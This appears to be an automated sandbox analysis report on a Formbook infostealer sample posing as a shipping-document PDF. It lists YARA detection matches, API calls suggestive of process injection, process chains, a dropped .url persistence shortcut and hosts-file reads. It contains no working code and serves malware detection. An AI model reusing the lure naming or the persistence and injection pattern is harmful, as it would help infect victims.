        Source: 0000000E.00000003.339915553.0000000003E70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000E.00000003.339915553.0000000003E70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000011.00000002.371342896.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000011.00000002.371342896.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000001.00000003.262859681.0000000002E84000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: 00000001.00000002.300537676.0000000002E38000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: 0000000B.00000002.370946797.00000000006C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000B.00000002.370946797.00000000006C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000C.00000002.323669387.0000000002CE8000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: 0000000B.00000002.369875714.0000000000690000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000B.00000002.369875714.0000000000690000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000012.00000001.339931194.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000012.00000001.339931194.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: Process Memory Space: Original Shipment Doc Ref 2853801324189923,PDF.exe PID: 5904, type: MEMORYSTRMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: Process Memory Space: Nyedvqj.exe PID: 6664, type: MEMORYSTRMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: Process Memory Space: Nyedvqj.exe PID: 6824, type: MEMORYSTRMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: Process Memory Space: netsh.exe PID: 2848, type: MEMORYSTRMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: C:\Users\Public\Libraries\jqvdeyN.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe, type: DROPPEDMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00401030
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_0041B8D6
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_0041C937
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_0041C254
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_0041CB9E
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_0041C425
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00408C80
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_0041C51F
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_0041C5F3
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00402D8B
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00402D90
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_0041C686
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_0041C74A
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_0041CF70
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_0041C776
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00402FB0
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BB20A0
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B9B090
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C520A8
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C41002
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BA4120
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B8F900
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00C522AE
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BBEBB0
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00B9841F
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00401030
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_0041B8D6
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_0041C937
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_0041C254
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_0041CB9E
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_0041C425
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00408C80
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_0041C51F
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_0041C5F3
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00402D8B
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00402D90
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_0041C686
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_0041C74A
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_0041CF70
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_0041C776
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00402FB0
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A020A0
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00AA20A8
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009EB090
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A91002
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009DF900
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009F4120
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00AA22AE
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A0EBB0
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A9DBD2
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00AA2B28
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009E841F
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A02581
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00AA25DD
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009ED5E0
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00AA2D07
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009D0D20
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00AA1D55
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00AA2EF7
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_009F6E30
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00AA1FF1
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: String function: 00B8B150 appears 31 times
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: String function: 009DB150 appears 35 times
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_004185E0 NtCreateFile,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00418690 NtReadFile,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00418710 NtClose,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_004187C0 NtAllocateVirtualMemory,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_004185DA NtCreateFile,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_0041868A NtReadFile,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_0041870C NtClose,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_004187BA NtAllocateVirtualMemory,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BC98F0 NtReadVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BC9860 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BC9840 NtDelayExecution,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BC99A0 NtCreateSection,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BC9A20 NtResumeThread,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BC9A00 NtProtectVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BC9A50 NtCreateFile,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BC95D0 NtClose,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BC9540 NtReadFile,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BC96E0 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BC9660 NtAllocateVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BC97A0 NtUnmapViewOfSection,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BC9780 NtMapViewOfSection,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BC9FE0 NtCreateMutant,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BC9710 NtQueryInformationToken,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BC98A0 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BC9820 NtEnumerateKey,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BCB040 NtSuspendThread,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BC99D0 NtCreateProcessEx,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BC9950 NtQueueApcThread,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BC9A80 NtOpenDirectoryObject,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BC9A10 NtQuerySection,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BCA3B0 NtGetContextThread,
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeCode function: 11_2_00BC9B00 NtSetValueKey,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_004185E0 NtCreateFile,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00418690 NtReadFile,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00418710 NtClose,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_004187C0 NtAllocateVirtualMemory,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_004185DA NtCreateFile,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_0041868A NtReadFile,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_0041870C NtClose,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_004187BA NtAllocateVirtualMemory,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A198F0 NtReadVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A19860 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A19840 NtDelayExecution,LdrInitializeThunk,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A199A0 NtCreateSection,LdrInitializeThunk,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A19910 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A19A20 NtResumeThread,LdrInitializeThunk,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A19A00 NtProtectVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A19A50 NtCreateFile,LdrInitializeThunk,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A195D0 NtClose,LdrInitializeThunk,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A19540 NtReadFile,LdrInitializeThunk,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A196E0 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A19660 NtAllocateVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A197A0 NtUnmapViewOfSection,LdrInitializeThunk,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A19780 NtMapViewOfSection,LdrInitializeThunk,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A19FE0 NtCreateMutant,LdrInitializeThunk,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A19710 NtQueryInformationToken,LdrInitializeThunk,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A198A0 NtWriteVirtualMemory,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A19820 NtEnumerateKey,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A1B040 NtSuspendThread,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A199D0 NtCreateProcessEx,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A19950 NtQueueApcThread,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A19A80 NtOpenDirectoryObject,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A19A10 NtQuerySection,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A1A3B0 NtGetContextThread,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A19B00 NtSetValueKey,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A195F0 NtQueryInformationFile,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A19520 NtWaitForSingleObject,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A1AD30 NtSetContextThread,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A19560 NtWriteFile,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A196D0 NtCreateKey,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A19610 NtEnumerateValueKey,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A19670 NtQueryInformationProcess,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A19650 NtQueryValueKey,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A19730 NtQueryVirtualMemory,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A1A710 NtOpenProcessToken,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A19760 NtOpenProcess,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A19770 NtSetInformationFile,
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeCode function: 17_2_00A1A770 NtOpenThread,
        Source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 0000000B.00000002.372809046.0000000000752000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamenetsh.exej% vs Original Shipment Doc Ref 2853801324189923,PDF.exe
        Source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 0000000B.00000002.378783717.0000000000E0F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Original Shipment Doc Ref 2853801324189923,PDF.exe
        Source: Nyedvqj.exe.1.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeSection loaded: msmpcom.dll
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeSection loaded: msmpcom.dll
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeSection loaded: msmpcom.dll
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeFile read: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeJump to behavior
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe 'C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe'
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeProcess created: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe
        Source: unknownProcess created: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe 'C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe'
        Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe 'C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe'
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeProcess created: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeProcess created: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeProcess created: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exe
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeProcess created: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeProcess created: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\Nyedvqjjpoxzcfrzmjpjbqexkpvtsgq[1]Jump to behavior
        Source: classification engineClassification label: mal100.troj.evad.winEXE@12/5@14/9
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\Original Shipment Doc Ref 2853801324189923,PDF.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
